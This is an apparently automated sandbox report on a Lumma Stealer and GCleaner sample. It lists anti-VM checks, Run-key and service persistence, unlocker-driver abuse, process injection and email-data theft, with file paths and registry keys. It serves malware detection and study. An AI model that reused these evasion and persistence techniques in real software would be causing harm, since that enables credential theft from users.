Malware Analysis Report

2025-08-10 19:57

Sample ID 250630-vsqp7saq2y
Target be49e07b0ddf04f073a8fddffa380c816c672431f1b54ae73753772029289e61.bin
SHA256 be49e07b0ddf04f073a8fddffa380c816c672431f1b54ae73753772029289e61
Tags
gcleaner lumma defense_evasion discovery execution loader persistence spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

be49e07b0ddf04f073a8fddffa380c816c672431f1b54ae73753772029289e61

Threat Level: Known bad

The file be49e07b0ddf04f073a8fddffa380c816c672431f1b54ae73753772029289e61.bin was found to be: Known bad.

Malicious Activity Summary

gcleaner lumma defense_evasion discovery execution loader persistence spyware stealer

Lumma Stealer, LummaC

GCleaner

Lumma family

Gcleaner family

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Sets service image path in registry

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Stops running service(s)

Reads user/profile data of local email clients

Checks computer location settings

Loads dropped DLL

Identifies Wine through registry keys

Executes dropped EXE

Checks BIOS information in registry

Adds Run key to start application

Checks installed software on the system

Enumerates processes with tasklist

Suspicious use of NtSetInformationThreadHideFromDebugger

AutoIT Executable

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Modifies data under HKEY_USERS

Suspicious behavior: LoadsDriver

Suspicious use of FindShellTrayWindow

Scheduled Task/Job: Scheduled Task

Suspicious use of AdjustPrivilegeToken

Modifies registry key

Kills process with taskkill

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-06-30 17:15

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-06-30 17:15

Reported

2025-06-30 17:17

Platform

win10v2004-20250610-en

Max time kernel

109s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\be49e07b0ddf04f073a8fddffa380c816c672431f1b54ae73753772029289e61.exe"

Signatures

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10525530101\a2dec68a76.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Sets service image path in registry

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\IObitUnlocker\ImagePath = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IObitUnlocker\\IObitUnlocker.sys" C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\IObitUnlocker\ImagePath = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IObitUnlocker\\IObitUnlocker.sys" C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\IObitUnlocker\ImagePath = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IObitUnlocker\\IObitUnlocker.sys" C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A

Stops running service(s)

defense_evasion execution

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10525530101\a2dec68a76.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10525530101\a2dec68a76.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3001560346-2020497773-4190896137-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3001560346-2020497773-4190896137-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\RoamingY9C2CH7OR3SXZYEAULUX5B50BMNOIUOS.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-3001560346-2020497773-4190896137-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3001560346-2020497773-4190896137-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\10525550101\index.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3001560346-2020497773-4190896137-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3001560346-2020497773-4190896137-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3001560346-2020497773-4190896137-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3001560346-2020497773-4190896137-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3001560346-2020497773-4190896137-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3001560346-2020497773-4190896137-1000\Control Panel\International\Geo\Nation C:\Temper\dHzrrTgp.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\RoamingY9C2CH7OR3SXZYEAULUX5B50BMNOIUOS.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10525530101\a2dec68a76.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10525540101\593a78ecfe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10525550101\index.exe N/A
N/A N/A C:\Temper\mSPVyMsH.exe N/A
N/A N/A C:\Temper\pTLQnagR.exe N/A
N/A N/A C:\Temper\pzoljWug.exe N/A
N/A N/A C:\Temper\dHzrrTgp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Work\nircmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost015.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10525560101\0538aa2642.exe N/A
N/A N/A C:\Users\Admin\AppData\RoamingLWSLVVEH8CXRQMJM7LF4WXNYLUJCFBVW.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Work\7z.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Work\Unlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3001560346-2020497773-4190896137-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10525530101\a2dec68a76.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\svchost015.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A

Reads user/profile data of local email clients

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3001560346-2020497773-4190896137-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\0538aa2642.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10525560101\\0538aa2642.exe" C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001560346-2020497773-4190896137-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a2dec68a76.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10525530101\\a2dec68a76.exe" C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3001560346-2020497773-4190896137-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\index.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10525550101\\index.exe" C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10525530101\a2dec68a76.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1628 set thread context of 4800 N/A C:\Users\Admin\AppData\Local\Temp\10525540101\593a78ecfe.exe C:\Users\Admin\AppData\Local\Temp\svchost015.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\dumer.job C:\Users\Admin\AppData\RoamingY9C2CH7OR3SXZYEAULUX5B50BMNOIUOS.EXE N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10525560101\0538aa2642.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mode.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temper\pTLQnagR.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10525540101\593a78ecfe.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temper\mSPVyMsH.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\svchost015.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\RoamingLWSLVVEH8CXRQMJM7LF4WXNYLUJCFBVW.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\find.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\RoamingY9C2CH7OR3SXZYEAULUX5B50BMNOIUOS.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\find.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize C:\Windows\SysWOW64\reg.exe N/A
